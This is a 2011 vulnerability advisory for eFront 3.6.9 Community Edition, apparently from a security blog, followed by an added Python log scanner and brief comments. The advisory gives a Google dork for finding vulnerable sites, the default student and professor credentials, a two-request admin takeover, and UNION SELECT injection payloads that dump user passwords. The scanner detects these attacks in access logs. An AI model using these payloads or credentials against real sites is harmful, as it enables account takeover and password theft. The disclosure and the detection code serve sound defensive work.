EFront <= 3.6.9 Community Edition Multiple Vulnerabilities

Security center contact on 08 Sept 2011
Security center reply: 09 Sept 2011
Public Release: 07/10/2011

# Exploit Title: EFront
# Google Dork: “eFront (version 3.6.9)” inurl:index.php?ctg=*
# Date: 5/09/2011
# Author: IHTeam
# Software Link: http://www.efrontlearning.net/download/download-efront.html
# Tested on: efront_3.6.9_build11018
# Original Advisory: http://iht.li/FWh
# Advisory code: http://iht.li/p/0VV

Default username and password:
student:student
professor:professor

How to become admin:
Request 1: /change_account.php?login=admin
Request 2: /userpage.php
OR
simply use the [Switch account] option at the top of the page.
You are now in the admin area.

SQL Injections:
www/student.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/professor.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/admin.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
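
A log check for the two issues above, as an added example that is not part of the original advisory: it flags SQL keywords in the `folder` parameter of the messages pages and a `change_account.php?login=` request followed by `userpage.php` from the same client. The log lines are constructed, and the combined log format, the `scan` function and the per-IP correlation are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [07/Oct/2011:10:00:01 +0000] "GET /www/student.php?ctg=messages&folder=3 HTTP/1.1" 200 5120
198.51.100.7 - - [07/Oct/2011:10:00:09 +0000] "GET /www/student.php?ctg=messages&folder=%20UNION%20ALL%20SELECT%201,2%20FROM%20users%20--%20 HTTP/1.1" 200 7300
203.0.113.20 - - [07/Oct/2011:10:02:00 +0000] "GET /change_account.php?login=admin HTTP/1.1" 302 0
203.0.113.20 - - [07/Oct/2011:10:02:01 +0000] "GET /userpage.php HTTP/1.1" 200 9100
192.0.2.5 - - [07/Oct/2011:10:03:00 +0000] "GET /userpage.php HTTP/1.1" 200 9100
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
SQL_RE = re.compile(r"\b(union|select)\b|--|/\*", re.I)
ROLE_PAGES = {"student.php", "professor.php", "admin.php"}  # pages named in the advisory


def scan(log_text):
    """Return (line_no, client_ip, finding) tuples for requests worth reviewing."""
    findings = []
    pending_switch = {}  # client ip -> login requested via change_account.php
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        page = url.path.rsplit("/", 1)[-1]
        params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
        # SQL syntax inside the folder parameter of the messages view
        if page in ROLE_PAGES and params.get("ctg") == ["messages"]:
            if any(SQL_RE.search(v) for v in params.get("folder", [])):
                findings.append((n, ip, "sqli-folder"))
        # Account switch by login name; the log alone cannot show who was
        # logged in, so this is flagged for review rather than as proof.
        if page == "change_account.php" and "login" in params:
            pending_switch[ip] = params["login"][0]
            findings.append((n, ip, "account-switch:" + params["login"][0]))
        elif page == "userpage.php" and ip in pending_switch:
            findings.append((n, ip, "userpage-after-switch:" + pending_switch.pop(ip)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
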

2 replies on “EFront <= 3.6.9 Community Edition Multiple Vulnerabilities”

Hi EgiX,
Let's say we limited ourselves to just that SQL injection 😛
We saw on the full-disclosure mailing list that you and some other guys were waiting for the 3.6.10 release to disclose, so we let it go.
Anyway, congratulations, you have a disclosure style that I like a lot!

Keep going!
